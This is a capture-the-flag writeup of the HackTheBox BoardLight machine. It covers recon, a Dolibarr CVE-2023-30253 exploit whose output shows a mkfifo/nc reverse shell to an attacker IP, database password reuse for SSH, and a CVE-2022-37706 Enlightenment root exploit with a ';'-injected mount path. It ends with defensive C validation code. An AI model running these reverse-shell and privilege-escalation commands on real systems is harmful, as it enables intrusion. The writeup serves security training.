
HTB BoardLight writeup (enlightenment 0.23.1 exploit)

HTB BoardLight writeup

  • Experts, please skip this!
    • Information gathering
      • nmap
      • http
    • Shell as www-data
      • Dolibarr 17.0.0 default credentials
      • Dolibarr 17.0.0 exploit
    • Shell as larissa
    • Shell as root
      • suid
        • enlightenment 0.23.1 exploit

Experts, please skip this!

BoardLight attack points:
1. Dolibarr default credentials and a CVE vulnerability

2. Database password reuse

3. SUID + enlightenment 0.23.1

Information gathering

nmap

└─$ nmap -p- --min-rate 1000 10.10.11.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-05 15:50 CST
Nmap scan report for 10.10.11.11
Host is up (0.21s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 72.64 seconds
└─$ nmap -p22,80 -sC -sV --min-rate 1000 10.10.11.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-05 15:52 CST
Nmap scan report for 10.10.11.11
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds

The target exposes SSH on port 22 and HTTP on port 80; the operating system is Ubuntu.

http

http://10.10.11.11

The domain name board.htb was collected from the site; add it to /etc/hosts.

echo 10.10.11.11   board.htb  | sudo tee -a /etc/hosts

http://board.htb/


The web service looks the same whether accessed by IP or by domain name.

ffuf

└─$ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -t 100 -fw 6243

ffuf v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: all
 :: Filter           : Response words: 6243
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 483ms]
#www                    [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 172ms]
#mail                   [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 168ms]
#smtp                   [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 180ms]
#pop3                   [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 177ms]
:: Progress: [114442/114442] :: Job [1/1] :: 365 req/sec :: Duration: [0:04:05] :: Errors: 0 ::

The subdomain crm.board.htb was found; add it to /etc/hosts as well.

10.10.11.11  crm.board.htb board.htb

http://crm.board.htb/


Dolibarr is an open-source ERP/CRM system built on a PHP + JavaScript stack, with a modular design, support for multiple databases and cross-platform deployment; flexibility and easy extensibility are its core technical characteristics.

Shell as www-data

Dolibarr 17.0.0 default credentials

The Dolibarr 17.0.0 default credentials are admin / admin.

Dolibarr 17.0.0 exploit

A usable exploit script for CVE-2023-30253 was found.

CVE-2023-30253 exploit

└─$ python3 CVE-2023-30253.py --url http://crm.board.htb/ -u admin -p admin -r 10.10.16.3 9000
[+] By Rubikcuv5.
[*] Url: http://crm.board.htb/
[*] User: admin
[*] Password: admin
[*] Reverseshell info:
IP:10.10.16.3
PORT:9000
[*] Verifying accessibility of URL:http://crm.board.htb//admin/index.php
[*] Attempting login to http://crm.board.htb//admin/index.php as admin
[+] Login successfully!
[*] Creating web site ...
[+] Web site was create successfully!
[*] Creating web page ...
[+] Web page was create successfully!
[+] Trying to bind to :: on port 9000: Done
[*] Executing command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 9000 >/tmp/f
[+] Waiting for connections on :::9000: Got connection from ::ffff:10.10.11.11 on port 53636
[*] Switching to interactive mode
sh: 0: can't access tty; job control turned off
$ $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

You can also start your own listener on Kali and then upgrade to a fully interactive shell.

script /dev/null -c bash
Ctrl + z
stty raw -echo;fg
reset
screen

CVE-2023-30253 manual exploitation


└─$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.11.11] 36228
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 23:10:16 up 34 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as larissa

Gather user information on the target.

www-data@boardlight:~/html/crm.board.htb/htdocs/website$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash

Review the web application's configuration to collect the database credentials: dolibarrowner / serverfun2$2023!!.

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ls -la
total 56
drwxr-xr-x  2 www-data www-data  4096 May 17  2024 .
drwxr-xr-x 79 www-data www-data  4096 Mar  4  2023 ..
-rw-r--r--  1 www-data www-data    31 Mar  4  2023 .htaccess
-rw-r--r--  1 www-data www-data  1736 May 17  2024 conf.php
-rw-r--r--  1 www-data www-data 16394 Mar  4  2023 conf.php.example
-r--------  1 www-data www-data 16394 May 13  2024 conf.php.old
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
<?php
...[snip]...
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
...[snip]...

Password reuse: try the database password to log in as the larissa user.

└─$ ssh larissa@10.10.11.11
larissa@10.10.11.11's password: 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ 
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$ ls -la
total 76
drwxr-x--- 15 larissa larissa 4096 May 17  2024 .
drwxr-xr-x  3 root    root    4096 May 17  2024 ..
lrwxrwxrwx  1 root    root       9 Sep 18  2023 .bash_history -> /dev/null
-rw-r--r--  1 larissa larissa  220 Sep 17  2023 .bash_logout
-rw-r--r--  1 larissa larissa 3771 Sep 17  2023 .bashrc
drwx------  2 larissa larissa 4096 Sep  7 18:14 .cache
drwx------ 12 larissa larissa 4096 May 17  2024 .config
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Desktop
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Documents
drwxr-xr-x  3 larissa larissa 4096 May 17  2024 Downloads
drwxr-xr-x  3 larissa larissa 4096 May 17  2024 .local
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Music
lrwxrwxrwx  1 larissa larissa    9 Sep 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Pictures
-rw-r--r--  1 larissa larissa  807 Sep 17  2023 .profile
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Public
drwx------  2 larissa larissa 4096 May 17  2024 .run
drwx------  2 larissa larissa 4096 May 17  2024 .ssh
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Templates
-rw-r-----  1 root    larissa   33 Sep  7 17:16 user.txt
drwxr-xr-x  2 larissa larissa 4096 May 17  2024 Videos

Shell as root

suid

When a file has the SUID bit set, it runs with the privileges of the file's owner rather than those of the caller; this is commonly used to let ordinary users run programs that need elevated privileges.

larissa@boardlight:~$ find / -perm -4000 -type f 2>/dev/null -exec ls -la {} \;
-rwsr-xr-x 1 root root 14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 14488 Apr  8  2024 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 26944 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
-rwsr-xr-x 1 root root 14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
-rwsr-xr-x 1 root root 14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
-rwsr-xr-x 1 root root 14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
-rwsr-xr-- 1 root messagebus 51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 477672 Jan  2  2024 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root dip 395144 Jul 23  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 44784 Feb  6  2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 55528 Apr  9  2024 /usr/bin/mount
-rwsr-xr-x 1 root root 166056 Apr  4  2023 /usr/bin/sudo
-rwsr-xr-x 1 root root 67816 Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 85064 Feb  6  2024 /usr/bin/chfn
-rwsr-xr-x 1 root root 39144 Apr  9  2024 /usr/bin/umount
-rwsr-xr-x 1 root root 88464 Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 68208 Feb  6  2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 39144 Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 53040 Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 14728 Oct 27  2023 /usr/bin/vmware-user-suid-wrapper

enlightenment

Enlightenment is a lightweight, highly customizable Linux desktop environment built on EFL, offering efficient performance and polished visual effects. It grew from a window manager first released in 1996 into a nearly complete desktop shell, suited to low-spec devices and users who want heavy customization. Although less well known in Asia, its modular design and cross-platform support give it a distinctive place in the Linux ecosystem.

larissa@boardlight:~$ enlightenment -version
ESTART: 0.00000 [0.00000] - Begin Startup
ESTART: 0.00009 [0.00009] - Signal Trap
ESTART: 0.00014 [0.00005] - Signal Trap Done
ESTART: 0.00019 [0.00005] - Eina Init
ESTART: 0.00039 [0.00020] - Eina Init Done
ESTART: 0.00043 [0.00005] - Determine Prefix
ESTART: 0.00054 [0.00011] - Determine Prefix Done
ESTART: 0.00057 [0.00003] - Environment Variables
ESTART: 0.00060 [0.00003] - Environment Variables Done
ESTART: 0.00063 [0.00003] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!

enlightenment 0.23.1 exploit

CVE-2022-37706

The public vulnerability CVE-2022-37706 was found.

Enlightenment v0.25.3 - Privilege escalation

larissa@boardlight:~$ file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
larissa@boardlight:~$ mkdir -p /tmp/net
larissa@boardlight:~$ mkdir -p "/dev/../tmp/;/tmp/exploit"
larissa@boardlight:~$ echo "/bin/sh" > /tmp/exploit
larissa@boardlight:~$ chmod a+x /tmp/exploit
# The mount command below is a single line; the earlier line breaks in it were spaces.
larissa@boardlight:~$ ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
# 
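As an added example (not Enlightenment's own code and not part of the original writeup): the kind of input validation a setuid helper such as enlightenment_sys needs before it hands a caller-supplied device path to mount. CVE-2022-37706 is exploitable because the path reaches the system() library function as part of a shell command line, which is why "/dev/../tmp/;/tmp/exploit" both escapes the /dev/ prefix and injects a second command. The function names and the mount options below are assumptions of this example.

```c
#include <stdbool.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Bytes that change meaning on a shell command line. Rejecting them is a
   belt-and-braces measure; the real fix is to never build a shell string. */
static const char SHELL_META[] = ";|&$`<>()\"'\\ \t\n*?[]{}#~";

/* True if any '/'-separated component of p is "." or "..". A bare prefix
   check on "/dev/" is not enough: "/dev/../tmp/..." passes that check. */
static bool has_dot_component(const char *p)
{
    const char *s = p;
    for (;;) {
        const char *e = strchr(s, '/');
        size_t n = e ? (size_t)(e - s) : strlen(s);
        if ((n == 1 && s[0] == '.') || (n == 2 && s[0] == '.' && s[1] == '.'))
            return true;
        if (!e) return false;
        s = e + 1;
    }
}

/* Accept only an absolute path under /dev/ with no dot components and no
   shell metacharacters. The page's payload "/dev/../tmp/;/tmp/exploit" is
   rejected twice over: the ".." component and the ';'. */
bool is_safe_device_path(const char *p)
{
    if (!p || strncmp(p, "/dev/", 5) != 0) return false;
    if (strlen(p) > 255) return false;
    if (strpbrk(p, SHELL_META) != NULL) return false;
    return !has_dot_component(p);
}

/* Invoke mount via fork/execv with a fixed argv, so caller-supplied strings
   can only ever be arguments, never commands. Returns mount's exit status,
   or -1 if the path is rejected or the child cannot be started. */
int mount_device(const char *dev, const char *target)
{
    if (!is_safe_device_path(dev)) return -1;   /* refuse before doing anything */
    char *const argv[] = {"/bin/mount", "-o", "nosuid,nodev,noexec",
                          (char *)dev, (char *)target, NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(argv[0], argv); _exit(127); }   /* no shell involved */
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```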
http://www.dtcms.com/a/490475.html
